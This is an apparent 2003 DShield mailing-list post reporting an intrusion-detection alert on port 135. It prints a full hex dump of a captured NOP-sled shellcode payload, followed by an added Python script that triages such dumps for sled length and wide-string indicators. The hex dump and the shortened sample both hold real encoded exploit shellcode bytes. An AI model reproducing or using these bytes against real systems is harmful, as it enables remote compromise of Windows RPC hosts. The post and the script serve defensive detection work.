[Dshield] shellcode detect on port 135

DAN MORRILL dan_20407 at msn.com
Thu Aug 21 13:00:10 GMT 2003


New and interesting: shellcode detect on port 135 around 2003-08-21 02:33:54.

I have never seen shellcode on port 135 before. Here is as much information 
on this as I have; if I see any other detects, I will forward them if wanted.

Good Morning!
r/
Dan

--------------------------------------------------------------------------------
Meta  ID # Time Triggered Signature
5 - 6051 2003-08-21 02:33:54 [arachNIDS][snort] SHELLCODE x86 NOOP

Sensor name interface filter


IP  source addr   dest addr   Ver Hdr Len TOS length ID flags offset TTL chksum
65.104.244.139    X.X.X.X     4   5       0   806    50174 0     0      111 19765

FQDN Source Name Dest. Name
w139.z065104244.aus-tx.dsl.cnc.net

Options     none

D-Port 135

N seq # ack offset res window urp chksum
3946 135    X  X     1569699291 2059210510 5 0 64180 0 37506

Options     none

Payload   length = 766

000 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
020 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
030 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
040 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
050 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
060 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
070 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
080 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
090 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
100 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
110 : 90 90 90 90 90 90 90 90 90 90 90 90 EB 10 5A 4A   ..............ZJ
120 : 33 C9 66 B9 76 01 80 34 0A 99 E2 FA EB 05 E8 EB   3.f.v..4........
130 : FF FF FF 70 61 99 99 99 C3 21 95 69 64 E6 12 99   ...pa....!.id...
140 : 12 E9 85 34 12 D9 91 12 41 12 EA A5 9A 6A 12 EF   ...4....A....j..
150 : E1 9A 6A 12 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8   ..j....b....t...
160 : 12 A6 9A 62 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A   ...b.k...j?.....
170 : 5E 9D DC 7B 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48   ^..{p....T....ZH
180 : 78 9A 58 AA 50 FF 12 91 12 DF 85 9A 5A 58 78 9B   x.X.P.......ZXx.
190 : 9A 58 12 99 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3   .X...Z.c.n._..I.
1a0 : 9A C0 71 ED 99 99 99 1A 5F 94 CB CF 66 CE 65 C3   ..q....._...f.e.
1b0 : 12 41 F3 9A C0 71 F8 99 99 99 1A 75 DD 12 6D F3   .A...q.....u..m.
1c0 : 89 C0 10 9D 17 7B 62 C9 C9 C9 C9 F3 98 F3 9B 66   .....{b........f
1d0 : CE 6D 12 41 10 C7 A1 10 C7 A5 10 C7 D9 FF 5E DF   .m.A..........^.
1e0 : B5 98 98 14 DE 89 C9 CF AA 59 C9 C9 C9 F3 98 C9   .........Y......
1f0 : C9 14 CE A5 5E 9B FA F4 FD 99 CB C9 66 CE 71 5E   ....^.......f.q^
200 : 9E 9B 99 9B 5A 5E DE 9D D8 F1 6D 12 F3 89 CE CA   ....Z^....m.....
210 : 66 CE 61 CA 66 CE 65 C9 66 CE 75 AA 59 35 1C 59   f.a.f.e.f.u.Y5.Y
220 : EC 60 C8 CB CF CA 66 4B C3 C0 32 7B 77 AA 59 5A   .`....fK..2{w.YZ
230 : 71 9A 66 66 66 DE FC ED C9 EB F6 FA D8 FD FD EB   q.fff...........
240 : FC EA EA 99 DA EB FC F8 ED FC C9 EB F6 FA FC EA   ................
250 : EA D8 99 DC E1 F0 ED CD F1 EB FC F8 FD 99 D5 F6   ................
260 : F8 FD D5 F0 FB EB F8 EB E0 D8 99 EE EA AB C6 AA   ................
270 : AB 99 CE CA D8 CA F6 FA F2 FC ED D8 99 FA F6 F7   ................
280 : F7 FC FA ED 99 FA F5 F6 EA FC EA F6 FA F2 FC ED   ................
290 : 99 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00   ..\.C.$.\.1.2.3.
2a0 : 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00   4.5.6.1.1.1.1.1.
2b0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00   1.1.1.1.1.1.1.1.
2c0 : 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 01 10   1.1...d.o.c.....
2d0 : 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00   ...... ...0.-...
2e0 : 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C   ...*..........(.
2f0 : 0C 00 01 00 00 00 07 00 00 00 00 00 00 00         ..............

Sometimes MSN E-mail will indicate that the message failed to be delivered. 
Please resend when you get those; it does not mean that the mailbox is bad, 
merely that MSN mail is overworked at the time.

Otherwise, hope things are going well.
r/
Dan
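For anyone who wants to triage a capture like the one above without touching the payload itself, here is an added Python example (it is not part of Dan's post, nor of the ACID/Snort tooling the alert came from). It parses a dump in the same "offset : bytes   ascii" layout, measures the run of 0x90 bytes that the SHELLCODE x86 NOOP signature keys on, and pulls out the wide-character (UTF-16LE) strings such as the `\C$\...doc` path visible at the tail of the capture, which are the kind of indicator a responder can search for on hosts. The sample dump embedded below is constructed for this example (a short stand-in for the 766-byte capture), and the function names and output keys are mine; nothing in it decodes or executes the shellcode.

```python
import string
from typing import Dict, List, Tuple

# Constructed sample in the same "OFF : hex bytes   ascii" layout as the
# ACID/snort payload dump in the post. It is a short stand-in for the
# 766-byte capture, not the capture itself: a 44-byte run of 0x90,
# a few non-NOP bytes, then a UTF-16LE path like the one at the tail.
SAMPLE_DUMP = r"""
000 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
020 : 90 90 90 90 90 90 90 90 90 90 90 90 EB 10 5A 4A   ..............ZJ
030 : 33 C9 66 B9 76 01 80 34 0A 99 E2 FA EB 05 E8 EB   3.f.v..4........
040 : 99 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00   ..\.C.$.\.1.2.3.
050 : 34 00 35 00 36 00 2E 00 64 00 6F 00 63 00 00 00   4.5.6...d.o.c...
"""


def _is_hex(tok: str) -> bool:
    return bool(tok) and all(c in string.hexdigits for c in tok)


def parse_hex_dump(text: str, width: int = 16) -> bytes:
    """Rebuild the raw payload from an "offset : bytes   ascii" dump.

    Only tokens that are exactly two hex digits are taken, at most
    `width` per line, so the ASCII column on the right is never read
    as data. The offset column is checked against the bytes collected
    so far, which catches a dropped or duplicated line in a pasted dump.
    """
    out = bytearray()
    for line in text.splitlines():
        offset_part, sep, rest = line.partition(":")
        offset_part = offset_part.strip()
        if not sep or not _is_hex(offset_part):
            continue  # not a dump line (blank, header, etc.)
        if int(offset_part, 16) != len(out):
            raise ValueError(
                f"offset {offset_part} does not match {len(out)} bytes read so far"
            )
        taken = 0
        for tok in rest.split():
            if taken >= width or len(tok) != 2 or not _is_hex(tok):
                break
            out.append(int(tok, 16))
            taken += 1
    return bytes(out)


def longest_run(data: bytes, value: int) -> Tuple[int, int]:
    """(start, length) of the longest run of `value` in `data`; (0, 0) if absent."""
    best_start = best_len = 0
    i, n = 0, len(data)
    while i < n:
        if data[i] != value:
            i += 1
            continue
        j = i
        while j < n and data[j] == value:
            j += 1
        if j - i > best_len:
            best_start, best_len = i, j - i
        i = j
    return best_start, best_len


def utf16le_strings(data: bytes, min_chars: int = 4) -> List[str]:
    """Printable ASCII stored as UTF-16LE (each char followed by a NUL byte).

    Scans byte by byte, so strings at odd as well as even offsets are found.
    """
    found: List[str] = []
    cur: List[str] = []
    i = 0
    while i + 1 < len(data):
        lo, hi = data[i], data[i + 1]
        if hi == 0 and 0x20 <= lo < 0x7F:
            cur.append(chr(lo))
            i += 2
            continue
        if len(cur) >= min_chars:
            found.append("".join(cur))
        cur = []
        i += 1
    if len(cur) >= min_chars:
        found.append("".join(cur))
    return found


def triage(dump_text: str, nop: int = 0x90) -> Dict[str, object]:
    """Summarise what the SHELLCODE x86 NOOP signature keyed on, plus any
    wide strings (file names, share paths) a responder can search for."""
    data = parse_hex_dump(dump_text)
    start, length = longest_run(data, nop)
    return {
        "payload_len": len(data),
        "nop_sled_start": start,
        "nop_sled_len": length,
        "first_non_nop_offset": start + length if length else None,
        "wide_strings": utf16le_strings(data),
    }


if __name__ == "__main__":
    for key, val in triage(SAMPLE_DUMP).items():
        print(f"{key}: {val}")
```

Paste the full dump from the alert in place of the constructed sample and the same calls apply; the offset check will complain if a line went missing in the copy, and the wide-string list is the part worth feeding to a host search.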
